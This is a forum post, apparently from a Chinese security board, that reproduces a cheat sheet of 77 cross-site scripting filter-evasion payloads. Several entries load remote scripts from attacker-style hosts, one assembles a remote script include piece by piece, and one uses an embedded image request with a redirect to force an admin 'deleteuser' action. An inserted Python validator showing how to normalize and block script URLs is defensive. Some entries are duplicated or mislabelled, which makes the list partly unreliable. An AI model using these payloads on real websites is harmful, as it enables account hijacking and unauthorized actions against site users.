12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6

It seems t00ls has rather little material on XSS; I saw something good and copied it over, not sure whether any of you need to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically useless domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters in front of the JavaScript
<IMG SRC=" javascript:alert('XSS');">
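Entries 3 to 19 (and the vbscript variant in 40) all exploit the same weakness: a filter that looks for the literal text javascript: in the raw attribute value, while the browser first decodes character references (with or without a trailing semicolon), discards NUL, tab, newline and carriage return anywhere in the URL, strips leading control characters and spaces, and only then reads the scheme case-insensitively. The following is an added example, not code from the original post or from fuzzexp.org; it is a hypothetical server-side validator in Python (standard library only) that normalizes the value the way the browser will before deciding on the scheme, and the sample values are constructed here to mirror the entries above rather than taken from any site. Treating data: as a script scheme is a policy assumption of this example.

```python
import html
import re
from typing import Dict, Optional, Tuple

# The HTML URL parser drops NUL, tab, LF and CR wherever they occur in the
# value before it looks at the scheme; that is why the "embedded tab",
# "embedded newline", "embedded carriage return" and "null character"
# entries get past a filter that wants to see the literal text javascript:.
_DROPPED_ANYWHERE = re.compile(r"[\x00\t\n\r]")
# Leading C0 controls and spaces are stripped as well ("spaces and meta
# characters in front" entry).
_LEADING_JUNK = "".join(chr(c) for c in range(0x21))
# Schemes that execute code when used as an IMG/A/IFRAME source
# (including data: here is a policy choice of this example).
_SCRIPT_SCHEMES = ("javascript", "vbscript", "data")


def normalize_url_attr(value: str) -> str:
    """Approximate the browser's view of an attribute value: decode character
    references (the trailing ';' is optional, as entries 9 and 10 rely on),
    drop the characters the URL parser ignores, strip leading controls/spaces."""
    decoded = html.unescape(value)
    decoded = _DROPPED_ANYWHERE.sub("", decoded)
    return decoded.lstrip(_LEADING_JUNK)


def url_scheme(value: str) -> Optional[str]:
    """Lower-cased scheme of the normalized value, or None if it has none."""
    match = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", normalize_url_attr(value))
    return match.group(1).lower() if match else None


def is_script_url(value: str) -> bool:
    """Decide on the parsed scheme, not on the raw text (so case folding is free)."""
    return url_scheme(value) in _SCRIPT_SCHEMES


def naive_filter_blocks(value: str) -> bool:
    """The literal substring check that the entries above are built to evade."""
    return "javascript:" in value


# Constructed attribute values modelled on the numbered entries (hypothetical
# inputs, not captured from any site). All but the two "benign" ones are
# spellings of the same javascript:/vbscript: URL.
SAMPLES: Dict[str, str] = {
    "(4) mixed case": "JaVaScRiPt:alert('XSS')",
    "(5) decimal entities": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "(9) entities, no ';'": "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58alert('XSS')",
    "(10) hex entities": "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
    "(11) embedded tab": "jav\tascript:alert('XSS')",
    "(12) encoded tab": "jav&#x09;ascript:alert('XSS')",
    "(13) encoded newline": "jav&#x0A;ascript:alert('XSS')",
    "(14) encoded CR": "jav&#x0D;ascript:alert('XSS')",
    "(17) null byte": "java\x00script:alert('XSS')",
    "(19) leading space and control": " &#14; javascript:alert('XSS')",
    "(40) vbscript": "vbscript:msgbox(\"XSS\")",
    "benign absolute": "http://example.com/",
    "benign relative": "javascript.html",
}


def classify(samples: Dict[str, str]) -> Dict[str, Tuple[bool, bool]]:
    """Per sample: (naive substring filter blocks it, scheme check blocks it)."""
    return {name: (naive_filter_blocks(v), is_script_url(v)) for name, v in samples.items()}


if __name__ == "__main__":
    for name, (naive, strict) in classify(SAMPLES).items():
        print(f"{name:32} naive_filter={naive!s:5} scheme_check={strict}")
```

Running the block prints one row per sample; the naive filter passes most of the encoded and split variants, while the scheme check rejects every one of them and still accepts the two benign values. The check is an allow-list over the parsed scheme rather than a block-list over raw text, which is the only shape that survives the rest of the encodings in this list; it does not cover the wider set of ignored characters entry 47 lists for CSS url() contexts (such as U+00A0, U+3000 and U+FEFF), so it belongs next to context-appropriate output encoding, not in place of it.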
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escape
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with a link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute, split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP as a decimal number
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Dropping the [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Dropping the [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14